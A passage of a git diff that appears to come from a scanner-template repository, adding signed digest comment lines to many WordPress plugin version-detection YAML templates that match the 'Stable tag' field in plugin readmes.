b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..9a93467549 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009edd0156c5cc8b5b678699334e1957281658dd849db3b786dcbea34e851d87ef0221008fe8e53ce2b0240810d04fbadc644d04d55e3d71d73fb0a8e8f306d3bce20c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..3e97323b19 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae41d8479a77bc646b7b723b038589f1f10d7166ec4d14a867b1b106d01ef03602210099fc656ee0d7909ad4893e1bb4757d7e13d0c664a970013ac1d8ca39bf760650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..43d263fc8d 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e18685816c6012c4f10e38ebacda9bb15922135acd00d6bcd07025565fdcc5e6022100d5f690d44aa4aae3128117be4e6f3e23ac8789e44b98ee5781c628018e6e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..d757b72dc0 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220780d62ddfd7598d22221567ab7b795b86ed19405bccaa529b2f8c4ab528c9ed80221009862677dedffe28ccf8c7bc6eec23a4d07b0efbc04aadb76850d70cd16d4e459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..141e501dbc 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa0ed357a683b5445b0d5b9d9222ff3dcd06aa2a7fd976ccd8b6c1bbba596aab022067367a8e52812e8f8ae9d95686507344c4f6cdbad2b6c04e2b29a1d72468dbdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..c02ce33b98 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207fd4bc920c77930f54ebfa9c3e797239ce279501c134d8cdcc56b85c1d880ec60220701afa4523cfe387efe54bd67215e97d2d886566820f4fd8ef55cfe3f49636d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..bf6a35e349 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e362f0e91fcbc3a63c628b4f0d3bd24c9aa4866f41e40f0628738bd316a96d702205b0c8277424c3efeb8288cd8da0116756970d5d554ee831c039a5c59e3b774e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..055daeb94b 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203516c1d8aa0db0f02b6abe7c96a110dc1214b33581aeb2ace32d65c5bbc1b6fe0221008f44361b4c10773311522681f62d208e24b2c880f2ed47b44e6ab1799f3cd74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..a7c6b3dd8f 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207082f801483226470e10b54e66c05254fad0251dee96484f2cdd403e53759500022100b1ca3dc47d89cc547f925f64696d21f472e49f28d67b62541763f6b408632a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..e51ebf4706 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbd3ba1b0ab93948325bfe1665e6a7f1300d67c9078eb6153227cf827e9cf2ef02200e9686a7327a4af0948a9abdb888a855c82babfaa9ca76e71993cad86c9f7a73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..23751d6112 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abfc25744401a03dcb216b50d84fa546e88207237db0a3c2cbae9ef45a198197022100ef5ffc2a613627626d535cae1edcce251040e938e175f1b1710de0c5a3d952c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..ef3f7823a3 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d055b7bfd5584008f0bab3a3b863430d109fcf855fd0660bd99ed087c3bfc29302206cb192af79e9fc49fb40057128f910005d122473f170a2ab5a927fe683b4f906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..4d0202eb1b 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b488e09c22e61758d7740fb01e6e6b27646b2c52942082bf5ccd64fb58932c402207adafbbfab96f3b28a66d76092a1f9c74bf5550e6b06388e63347166ee77b832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..fd7807f0c4 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb0b374d28497dbaacc5d1e60398d2f1265f7a36d8cbf579321acd22879b95640220741184e075f30a4aeb13e4b0bf7b7aa9932012aac1a18c4b30bf2b6fa795ad01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..e9166fcb94 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b62daf113fecc88ec6b76fe0f2343d3980aff4ae1770d7cd9040bfa5ce6383d02203c46de2caf63278a99f422d9a312308ac349a9419656067024666a4f062e96f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..e188bb085b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220423796077f7866de15930bc25e35d1834c1675ac72da75894d677cbb7b5fca200220489884313d24e308bc766789d48a99f37ebe274d620437ce2802b5e58498a9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..84cfdb92dd 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8839424132ce73202c4affcb8b99417c1f94e2db2b2bcd3b3a286fbf2bbab8d022100cbf5de1e09c26cb7646be16dabcb53de5c948d1276b428a64dfe27cad948638a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..e321fb10b4 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b308a2277ad053a9035a75ca030560f0ef03a5b42dede95175296a62f299e13022100d9bbac803d35edaf741236a6bb90a8963c47abb2b3c7c6b243e7ae8b1acb6512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..35e40bcea9 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070fc4a3fe1c0bcd75884572d206af0cd43ba1fd6f35e0501990cc72a6ce329b202201e7c141521a021dcddf900833fd27364ecb2a778268f5d9067aa66a2c82705ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..790ff3accd 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a7eac103e54a33bf3619af408d7a10ee506061eb51adc4f03e1e4fceb573b39022100d4b8137885e62ef4d249f61aec975509fba4ab77889a6efcbba11a4326dca921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..29db49d18d 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfb836965e834b46893949a85458f323719d837d4139ac2858898036ead0bd5502207777240409d5660a9d2b26c6e398e8f353db5031fef7d5c69db0c9a98c580b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..a620aa5f18 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043425dd78623cb573da34e092416d9c4283e9b619d1ea3cead77ac5969a9e3fb02202befb2757621c303d994322afbfc7577c92a09247e1c371c54bf69c6478602d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..13e3400a31 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0fc439af9d1a762bcb24b875f2f0cc6e22ff0b4bca456eb5690711d85d8ab80022100e0202d1a2ae41d6d09d4561bb73eba3c6b134b851a51addd169384db08a4c698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..84eea515e6 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207bb0f8d6009d9a1a4d4401be25b52c6516893c33f39eb4d768dddd78f53bb8e9022100e79d0eec39ab6623bfb620a030c255d0d5c2fbe0accd554598d8b55e44fa1667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..a962d1376b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5f7d6165b9ece57399498e3e3472d8613899288ad2e64adb0c83c62f3f2d001022022355530e7a2b6354975a1b0c663bd5156751c007eb003c9e6a00924bba27f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..809be488f5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8f9e0a0fadd9ac46889390227292ba02ecbe597d53d18fa1f88397a608784e7022005c43050efe0b78888a2d413233700a7a5778b4cffc5fb374c905cfc28c4cffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..da6f3d6016 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9fb7ab29c61e5cb2354eac4b81bbabba383092edaa9cdf77591ece9ea79027502204d67328f8b4aff73025e236f96e9008d314eae61ffdf21d9aab00e6646b5ea0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..7a36d13dc8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009f96691efd9ba09ddac8893710c814ad4a309d56834bf17824de0ac2560eecf02206d1377ca9adbb59c3bb7fbf89010383aaa11eec13e2ad361636f2b86ea63fea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..1cc92e3650 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0239541ac0137c196fdc654a61bac659cc876ebf7e8181f78860e9220bfba5702203d5e832380d5113e52c1a530a79b87e14eba9d4629b1c1410dcf35210526d587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..267453218f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200775db4789159e050f4434b5047bb108e74c4bf0472b2a05506e5eb4a315f58c0220283f2ec5d3193e9d8eeceff0a996c9e1acd23cb80288e9388e0e160b8cc1c9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..53d0e74b25 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b1ec5e917af72b70d1afc1574b82b8c2eba9df7968a3de5ca24c056d316504e02201bf9691f97eab6aa86a620978063e49946fd06567cabef4759e3224ec2bf42f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..382137fe1b 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035f673700620b877594f83a98cf06ab95cb43b5b096abe831d7f8888e5e32a14022045e6b16f6b28066683115ddfa624be6684e831b308736ad3d96c1b53de0cd28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..09730ce402 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220201e138c1ec5581e4e6cb5899349f56b89b33f34ebdfa1f4f9a3ca56e5351c2202204d8ade600699c59892843da9213440c03adf408dba81b663ddc2ce1594a0b2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..2585b241ad 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031c2612d9d6f39f0396e0f87d1c39f54d1205fac1b40bed212e2ab67a56c60a6022014f60a00055a63539d24006e167fce59b8c7dbc13dc1d6419c8bd3f8945397fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..7b1fe38730 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059f4fdd0dab55b96f018d54d81596e4afde228dda1f0e85652b4dc4cf8ef2fbe022030ac9ed6d1ff46014141b58f3d585d951689598b5128372a5642b7b29fdf115b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..c6af7d4e38 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d236eb5968ddb506715903d4b9446f7275497719638170309f240736403a84302210086ee6a588f9d5c50b8d861c63e68f53ef3ce0bc8d89daaa55667305c3de8c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..e9527fa0e9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e90dffa5327c6fe3c76a1183fc072a166e228776ae10fc6262114956bedf0b002203be51f76d27001c3745b6de40a137760c5d002555f2d06e61717db41ae74bf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..f2d4ed95fb 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8df321ad63d2980483c02c1f226775f57df79850db23d117241f84f6d72d515022100f8b609bf335a06e509df815107fe83bc9f216c76e38285356a591f0cabde7abb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..39d352d944 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077553fc0f35cf4f36a1000de9f965b794d0d9b55c2d9be092eb057b91032b53a022100d681962a31b99d847851016e5f25eb96e484867f5cef6c9a1e49e07f42b6459c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..b81fa316da 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c68aefd3801c9b9cd191c31d933bf9511643aa894807231324d345563139f9f102205e35a9b263bdf20d7dc5fa367f34548d440498b1018a30d7138da5400a52b87d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..e3b2267975 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205932a7a3f6c6f323187328623b108111b70fd2340e997443d130344658b343d90221008202278d6d42219dbc9d57e6adc1bb9d9451a7d3d780434e955f6a6ceca214a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..e756a57938 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206623540bbcbc63e5cb996efd004adfeeff127c75195aeb646141aeadd18a06ac02202f471bdd75f19d2a0bd04c3b8704211ac4355ce50b3daf9c78a1c9dcb6eecb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..0fed5799a9 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c4092f6cfc305aeb53730d9e9a25dd6df135d7f913ccf74c05eb7535398e92c002204bd652e5ac62fc0d3023a81093599add81d14f53c3a1c97b7711a8bfec3cfef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..fe9e5f1b26 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df31fbe5717696c01866dc4917affce286609c907ba783b0ef2a2b96c745491102205cd240c73fcf7ef5a39f328f7f95bbc4eb92a19d2eead2cfa3eaeb888481a80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..5e4c0f3ca6 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096c85d6f9e277368ead68c2f0757d84091e2019197100eae001719cefd88cffb022100fac4ffbd52dbf02f155f717b4c78accf9b3b9fc0527e5a99282f13a767c89e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..a4ee11efef 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220650f8cea974d8b2e352a666a3e80626ddf8e452448a0790de672285f7e4d0b91022100c6eda07092e96a1ac6286299950c6a388a2d2cdd85cad87fcc3ff79a97fecbb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..0b2b7f0231 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 